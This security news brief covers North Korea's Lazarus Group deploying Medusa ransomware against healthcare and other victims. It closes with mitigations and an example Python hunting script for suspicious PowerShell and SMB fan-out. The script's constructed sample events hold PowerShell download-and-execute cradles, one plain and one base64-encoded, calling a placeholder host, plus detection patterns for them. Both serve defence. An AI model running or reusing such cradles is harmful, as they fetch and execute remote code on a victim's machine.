North Korea's Lazarus Group has expanded its extortion arsenal, deploying Medusa ransomware against at least one US healthcare organization and an unnamed Middle East victim, according to threat hunters at Symantec and Carbon Black. The US healthcare attempt was thwarted, but the Middle East target was successfully encrypted. Medusa's data-leak site has listed nearly 30 victims since November 2025, with ransom demands averaging $260,000 over a four-month window.

What Happened

Symantec and Carbon Black researchers disclosed in a Tuesday report that Lazarus operators have begun leveraging Medusa, a ransomware-as-a-service platform run by the Spearwing cybercrime crew. The attack against the US healthcare entity failed before encryption, while the Middle East organization was fully impacted by the Medusa strain. Researchers cautioned that attribution across all 30 leak-site victims remains murky, since affiliates other than Lazarus also use the Medusa toolkit. Four of the recent victims are US healthcare and nonprofit entities, including a mental health nonprofit and a school for children with autism.

What Was Taken

Specific data volumes from the Middle East victim have not been publicly disclosed. Medusa operations typically involve double-extortion: exfiltrating sensitive files before encryption and threatening publication on the group's leak site. In the broader Medusa victim pool, stolen data has historically included patient records, financial documents, intellectual property, and operational data from organizations across medical, education, legal, insurance, technology, and manufacturing sectors. The US healthcare target avoided data loss because the intrusion was disrupted prior to ransomware deployment.

Why It Matters

Lazarus pivoting to a commodity RaaS platform is a notable shift for a state-sponsored actor previously associated with bespoke families like Maui and Play. Borrowing affiliate infrastructure muddies attribution, lets Pyongyang piggyback on Spearwing's tradecraft, and accelerates revenue generation for a regime under heavy sanctions. The continued targeting of healthcare, including a mental health nonprofit and a facility serving autistic children, underscores that Lazarus subgroups such as Andariel (Stonefly, Onyx Sleet, Silent Chollima) remain willing to disrupt life-critical services for cash. With more than 366 Medusa attacks claimed since 2023 and a March 2025 FBI/CISA advisory still in effect, defenders in regulated sectors should treat Medusa indicators as a Lazarus-adjacent concern.

The Attack Technique

Researchers have not published a full intrusion chain for these specific incidents. Andariel, the Lazarus subgroup tied to North Korea's Reconnaissance General Bureau, has historically gained initial access through exploitation of unpatched public-facing applications, credential abuse, and IT worker infiltration schemes. Once inside, operators deploy commodity ransomware such as Medusa, Maui, or Play to monetize access. The use of Medusa suggests either a direct affiliate relationship with Spearwing or access to leaked Medusa builders and infrastructure. The US Justice Department has previously charged Andariel members, including Rim Jong Hyok in July 2024 and Song Kum Hyok in July 2025, in connection with hospital ransomware campaigns.

What Organizations Should Do

  1. Apply the joint FBI/CISA Medusa advisory mitigations, including patching internet-facing systems and disabling unused remote services such as RDP.
  2. Enforce phishing-resistant MFA across email, VPN, and privileged accounts to blunt Lazarus credential theft and IT worker schemes.
  3. Hunt for known Medusa and Andariel TTPs, including suspicious PowerShell, BYOVD driver abuse, and unusual SMB lateral movement.
  4. Maintain offline, immutable backups and rehearse restoration to defeat double-extortion leverage.
  5. Vet remote IT contractors and new hires for North Korean IT worker indicators, including mismatched identity documents and VPN-masked geolocation.
  6. Block known Medusa leak-site infrastructure and report incidents to CISA, FBI, and HHS HC3 to support broader attribution work.
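As an added illustration of the hunting step above (this is example code written for this page, not tooling from the article or from Symantec/Carbon Black), the script below scans constructed Windows-style telemetry for two of the behaviours the list names: suspicious PowerShell launches (encoded commands, download-and-evaluate cradles, hidden no-profile windows) and a single host fanning out SMB (TCP/445) connections to many peers. The record layout, field names, regexes and the fan-out threshold are assumptions for the demonstration, and the sample events are constructed, not real incident data; BYOVD driver abuse is not covered because it needs driver-load telemetry this sample does not model.

```python
import base64
import re
from collections import defaultdict


def _enc(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry (not real incident data): one record per
# PowerShell process creation and one per outbound TCP flow. Field names are
# assumptions made for this example.
SAMPLE_EVENTS = [
    # Benign scheduled inventory script.
    {"type": "process", "host": "ws-021",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
    # Hidden, profile-less, encoded download-and-evaluate: common loader shape.
    {"type": "process", "host": "ws-014",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _enc(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')")},
    # Plain-text evaluation of a remote payload, no encoding.
    {"type": "process", "host": "ws-030",
     "cmdline": "powershell -c \"iex (iwr http://example.invalid/x -UseBasicParsing)\""},
    # ws-014 also touches many peers over SMB; ws-021 only its usual file server.
    *[{"type": "network", "host": "ws-014", "dst": f"10.1.0.{i}", "dport": 445}
      for i in range(10, 18)],
    {"type": "network", "host": "ws-021", "dst": "10.1.0.2", "dport": 445},
    {"type": "network", "host": "ws-021", "dst": "10.1.0.3", "dport": 443},
]

# Matches -e, -ec, -en, -enc and -EncodedCommand followed by a base64 blob.
ENCODED_FLAG = re.compile(
    r"-e(?:c|n(?:c(?:odedcommand)?)?)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Content patterns: evaluating downloaded data or decoding payloads in memory.
SUSPICIOUS_CONTENT = [
    re.compile(p, re.IGNORECASE) for p in (
        r"\biex\b", r"invoke-expression", r"downloadstring", r"downloadfile",
        r"invoke-webrequest", r"\biwr\b", r"frombase64string",
    )
]
# Launch options typical of loaders: hidden window combined with no profile.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
NO_PROFILE = re.compile(r"-nop(?:rofile)?\b", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def powershell_reasons(cmdline: str) -> list:
    """List why a PowerShell command line looks suspicious (empty list = clean)."""
    reasons = []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded command")
    # Inspect both the raw command line and the decoded payload.
    text = cmdline + " " + (decoded or "")
    if any(p.search(text) for p in SUSPICIOUS_CONTENT):
        reasons.append("download/evaluate pattern")
    if HIDDEN_WINDOW.search(cmdline) and NO_PROFILE.search(cmdline):
        reasons.append("hidden window with no profile")
    return reasons


def smb_fanout(events, threshold: int = 5) -> dict:
    """Map each source host to the distinct SMB (TCP/445) peers it contacted,
    keeping only hosts at or above the fan-out threshold (an assumed tuning value)."""
    peers = defaultdict(set)
    for ev in events:
        if ev.get("type") == "network" and ev.get("dport") == 445:
            peers[ev["host"]].add(ev["dst"])
    return {h: sorted(p) for h, p in peers.items() if len(p) >= threshold}


def hunt(events, fanout_threshold: int = 5) -> list:
    """Run both hunts and return sorted (host, finding) tuples."""
    findings = []
    for ev in events:
        if ev.get("type") == "process" and "powershell" in ev["cmdline"].lower():
            for reason in powershell_reasons(ev["cmdline"]):
                findings.append((ev["host"], "powershell: " + reason))
    for host, peers in smb_fanout(events, fanout_threshold).items():
        findings.append((host, f"smb fan-out to {len(peers)} hosts"))
    return sorted(findings)


if __name__ == "__main__":
    for host, finding in hunt(SAMPLE_EVENTS):
        print(f"{host}\t{finding}")
```

Run against the constructed events, the benign inventory script on ws-021 produces nothing, ws-030 is flagged once for the plain-text download-and-evaluate cradle, and ws-014 is flagged for the encoded command, its decoded contents, the hidden no-profile launch, and the SMB fan-out to eight peers. In production the same two checks would sit over EDR process-creation events and firewall or flow logs, with the fan-out threshold baselined per environment so that legitimate admin hosts and backup servers are excluded rather than suppressed after the fact.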

Sources: Lazarus Group targets healthcare orgs with Medusa ransomware